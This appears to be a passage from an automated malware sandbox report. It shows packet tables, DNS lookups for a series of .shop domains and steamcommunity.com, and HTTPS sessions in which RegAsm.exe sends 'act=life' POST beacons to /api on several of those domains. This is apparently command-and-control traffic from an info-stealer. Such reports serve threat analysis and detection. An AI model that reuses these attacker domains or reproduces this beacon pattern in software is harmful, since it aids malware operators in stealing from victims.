                                                                    Sep 26, 2024 09:58:42.919449091 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.400226116 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.400410891 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.402456045 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.402473927 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.402793884 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.404257059 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.404294014 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.404361010 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.844053984 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.844160080 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.844253063 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.844546080 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.844546080 CEST49717443192.168.2.6188.114.96.3
                                                                    Sep 26, 2024 09:58:43.844567060 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.844578028 CEST44349717188.114.96.3192.168.2.6
                                                                    Sep 26, 2024 09:58:43.858867884 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:43.858923912 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:43.859020948 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:43.859379053 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:43.859401941 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.319098949 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.319185972 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.333034992 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.333059072 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.333312035 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.345961094 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.345982075 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.346097946 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.808388948 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.808480024 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.808613062 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.808640003 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.808655977 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.808670044 CEST49718443192.168.2.6172.67.208.139
                                                                    Sep 26, 2024 09:58:44.808675051 CEST44349718172.67.208.139192.168.2.6
                                                                    Sep 26, 2024 09:58:44.817842007 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:44.817914009 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:44.817997932 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:44.818289042 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:44.818325043 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.467680931 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.467847109 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:45.477921963 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:45.477952003 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.478240967 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.479790926 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:45.527405024 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.976089954 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.976114988 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.976129055 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.976247072 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:45.976284027 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:45.976342916 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.076517105 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.076546907 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.076710939 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.076739073 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.076785088 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.081887960 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.081955910 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.081973076 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.082001925 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.082017899 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.082046032 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.082133055 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.082146883 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.082159042 CEST49719443192.168.2.6104.102.49.254
                                                                    Sep 26, 2024 09:58:46.082165956 CEST44349719104.102.49.254192.168.2.6
                                                                    Sep 26, 2024 09:58:46.098612070 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.098674059 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:46.098813057 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.099143028 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.099160910 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:46.588026047 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:46.588193893 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.590251923 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.590266943 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:46.590517998 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:46.591792107 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.591792107 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:46.591871023 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:47.045320034 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:47.045413017 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:47.045497894 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:47.045881033 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:47.045881033 CEST49720443192.168.2.6172.67.189.2
                                                                    Sep 26, 2024 09:58:47.045907974 CEST44349720172.67.189.2192.168.2.6
                                                                    Sep 26, 2024 09:58:47.045918941 CEST44349720172.67.189.2192.168.2.6

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 26, 2024 09:58:36.812587023 CEST5201853192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:36.821825981 CEST53520181.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:36.830746889 CEST5988653192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:36.844813108 CEST53598861.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:37.948460102 CEST6228153192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:37.962512016 CEST53622811.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:38.871155977 CEST6350453192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:38.886204958 CEST53635041.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:39.967673063 CEST5073953192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:39.981395960 CEST53507391.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:40.957084894 CEST5810853192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:40.978657961 CEST53581081.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:41.924937010 CEST6534653192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:41.938756943 CEST53653461.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:42.902228117 CEST6512753192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:42.916310072 CEST53651271.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:43.845719099 CEST5547753192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:43.857887030 CEST53554771.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:44.810002089 CEST5624853192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:44.817159891 CEST53562481.1.1.1192.168.2.6
                                                                    Sep 26, 2024 09:58:46.085145950 CEST4944253192.168.2.61.1.1.1
                                                                    Sep 26, 2024 09:58:46.097533941 CEST53494421.1.1.1192.168.2.6

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Sep 26, 2024 09:58:36.812587023 CEST192.168.2.61.1.1.10xc6c0Standard query (0)lootebarrkeyn.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:36.830746889 CEST192.168.2.61.1.1.10x2a90Standard query (0)gutterydhowi.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:37.948460102 CEST192.168.2.61.1.1.10x3b7dStandard query (0)ghostreedmnu.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:38.871155977 CEST192.168.2.61.1.1.10x2fd0Standard query (0)offensivedzvju.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:39.967673063 CEST192.168.2.61.1.1.10x55d0Standard query (0)vozmeatillu.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:40.957084894 CEST192.168.2.61.1.1.10xf439Standard query (0)drawzhotdog.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:41.924937010 CEST192.168.2.61.1.1.10x473aStandard query (0)fragnantbui.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:42.902228117 CEST192.168.2.61.1.1.10x8492Standard query (0)stogeneratmns.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:43.845719099 CEST192.168.2.61.1.1.10xa923Standard query (0)reinforcenh.shopA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:44.810002089 CEST192.168.2.61.1.1.10x3a8eStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:46.085145950 CEST192.168.2.61.1.1.10x98c7Standard query (0)performenj.shopA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Sep 26, 2024 09:58:36.821825981 CEST1.1.1.1192.168.2.60xc6c0Name error (3)lootebarrkeyn.shopnonenoneA (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:36.844813108 CEST1.1.1.1192.168.2.60x2a90No error (0)gutterydhowi.shop104.21.4.136A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:36.844813108 CEST1.1.1.1192.168.2.60x2a90No error (0)gutterydhowi.shop172.67.132.32A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:37.962512016 CEST1.1.1.1192.168.2.60x3b7dNo error (0)ghostreedmnu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:37.962512016 CEST1.1.1.1192.168.2.60x3b7dNo error (0)ghostreedmnu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:38.886204958 CEST1.1.1.1192.168.2.60x2fd0No error (0)offensivedzvju.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:38.886204958 CEST1.1.1.1192.168.2.60x2fd0No error (0)offensivedzvju.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:39.981395960 CEST1.1.1.1192.168.2.60x55d0No error (0)vozmeatillu.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:39.981395960 CEST1.1.1.1192.168.2.60x55d0No error (0)vozmeatillu.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:40.978657961 CEST1.1.1.1192.168.2.60xf439No error (0)drawzhotdog.shop172.67.162.108A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:40.978657961 CEST1.1.1.1192.168.2.60xf439No error (0)drawzhotdog.shop104.21.58.182A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:41.938756943 CEST1.1.1.1192.168.2.60x473aNo error (0)fragnantbui.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:41.938756943 CEST1.1.1.1192.168.2.60x473aNo error (0)fragnantbui.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:42.916310072 CEST1.1.1.1192.168.2.60x8492No error (0)stogeneratmns.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:42.916310072 CEST1.1.1.1192.168.2.60x8492No error (0)stogeneratmns.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:43.857887030 CEST1.1.1.1192.168.2.60xa923No error (0)reinforcenh.shop172.67.208.139A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:43.857887030 CEST1.1.1.1192.168.2.60xa923No error (0)reinforcenh.shop104.21.77.130A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:44.817159891 CEST1.1.1.1192.168.2.60x3a8eNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:46.097533941 CEST1.1.1.1192.168.2.60x98c7No error (0)performenj.shop172.67.189.2A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:46.097533941 CEST1.1.1.1192.168.2.60x98c7No error (0)performenj.shop104.21.51.224A (IP address)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:51.973336935 CEST1.1.1.1192.168.2.60x995dNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                    Sep 26, 2024 09:58:51.973336935 CEST1.1.1.1192.168.2.60x995dNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • gutterydhowi.shop
                                                                    • ghostreedmnu.shop
                                                                    • offensivedzvju.shop
                                                                    • vozmeatillu.shop
                                                                    • drawzhotdog.shop
                                                                    • fragnantbui.shop
                                                                    • stogeneratmns.shop
                                                                    • reinforcenh.shop
                                                                    • steamcommunity.com
                                                                    • performenj.shop

                                                                    HTTPS Proxied Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.649710104.21.4.1364435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:37 UTC264OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: gutterydhowi.shop
                                                                    2024-09-26 07:58:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:37 UTC782INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=kvdt1uv3qgmesvk5at9pd9o5hs; expires=Mon, 20 Jan 2025 01:45:16 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HQoWPa0q%2FobEWf%2BwDYA3cL4yniS3e5B9dLVue1JUTmYT%2BpV34JgV%2FiDXAzbGDGAv5Pb4xEaxv42CnvHwH0uXJhnx8ByDWda9cxKQoTnnp%2F4yvDbEJ9shmObksqoEDPfwj%2FG%2BFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5bcbce40cb4-EWR
                                                                    2024-09-26 07:58:37 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.649711188.114.97.34435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:38 UTC264OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: ghostreedmnu.shop
                                                                    2024-09-26 07:58:38 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:38 UTC778INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=6bs0cnhi9hld6m77tqj7r9f0oa; expires=Mon, 20 Jan 2025 01:45:17 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yu0mEfZYCvmz%2FTLHEDoBAQ%2BZaBVHZL9LgNJZ1kit29n9HuOxRJLV878rxeyZgZ4s79SHkscLeL%2FvJvOvv2S1BnlvT9wr6gU0Ro3D8VjgjNEJ%2BbxCgrRwKrcV4sAkFvT%2FR7phuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5c299d50f99-EWR
                                                                    2024-09-26 07:58:38 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.649713188.114.96.34435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:39 UTC266OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: offensivedzvju.shop
                                                                    2024-09-26 07:58:39 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:39 UTC764INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=kqe6t1nd2b2cc3biafcu1qbeti; expires=Mon, 20 Jan 2025 01:45:18 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bngkqg7o2IBD3mDlSbK2nvRb04Hpu6Tc8AQbjKGv0O9CRjDWCYHPz2tova2wa7O23wCWyBBlCCfzi7p8dbqF1rbY4bAglwUFUKozVwCnZOVmifGRszVgmpsYZFzNQMuqMxem1cks"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5c96b2480e2-EWR
                                                                    2024-09-26 07:58:39 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.649714188.114.96.34435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:40 UTC263OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: vozmeatillu.shop
                                                                    2024-09-26 07:58:40 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:40 UTC794INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=q41mipf7srthnitfvbc09v0jhk; expires=Mon, 20 Jan 2025 01:45:19 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCAqN8UVAzkNXF2c8j0i3Hz%2BqKsCSU84BpZvhxv5R18t5%2BIgJ0CpojhxwTXPWcM42dBAfUVzqZcJ4MMGXxX4E98VrwfKOIG7YL4J8jgAya0CfVnb3NkPlCfgPCjG5c8GdXlF"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5cf29e5434f-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    2024-09-26 07:58:40 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.649715172.67.162.1084435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:41 UTC263OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: drawzhotdog.shop
                                                                    2024-09-26 07:58:41 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:41 UTC766INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=vej52j2undbc1fpl7j02mtdsjk; expires=Mon, 20 Jan 2025 01:45:20 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YCEsBOEd1RZuqLcqI5VfRFMZoOdrO%2BVVBVJs3uaZqyP3Fk0ZjcRVum25jzZtUdoekTIwd4EvUhPre%2FcHozhnMstYr6eYfwvoXKTHCUy7%2BpUeB6Mv8QiIrPAbxgj0HPaLo7Zh"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5d58deb41bb-EWR
                                                                    2024-09-26 07:58:41 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.649716188.114.96.34435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-09-26 07:58:42 UTC263OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 8
                                                                    Host: fragnantbui.shop
                                                                    2024-09-26 07:58:42 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                    Data Ascii: act=life
                                                                    2024-09-26 07:58:42 UTC768INHTTP/1.1 200 OK
                                                                    Date: Thu, 26 Sep 2024 07:58:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=op4hv8vat0mafiv84epb3ruc9l; expires=Mon, 20 Jan 2025 01:45:21 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    CF-Cache-Status: DYNAMIC
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ux24cVqNkqK%2BxBAjvTikk%2BIRtdetUQQbZmQ9ygadknZ0G45Boih5X3vUFuHIVZzJo6ZIcek1lSzlT6%2B4GfZhmBdDPIuaxuh4vzH%2BpUuQI9ybIsFzaflwdE7PS3hSC5fR3WQB"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8c91b5dbad75c420-EWR
                                                                    2024-09-26 07:58:42 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                    Data Ascii: aerror #D12
                                                                    2024-09-26 07:58:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.649717188.114.96.34435396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
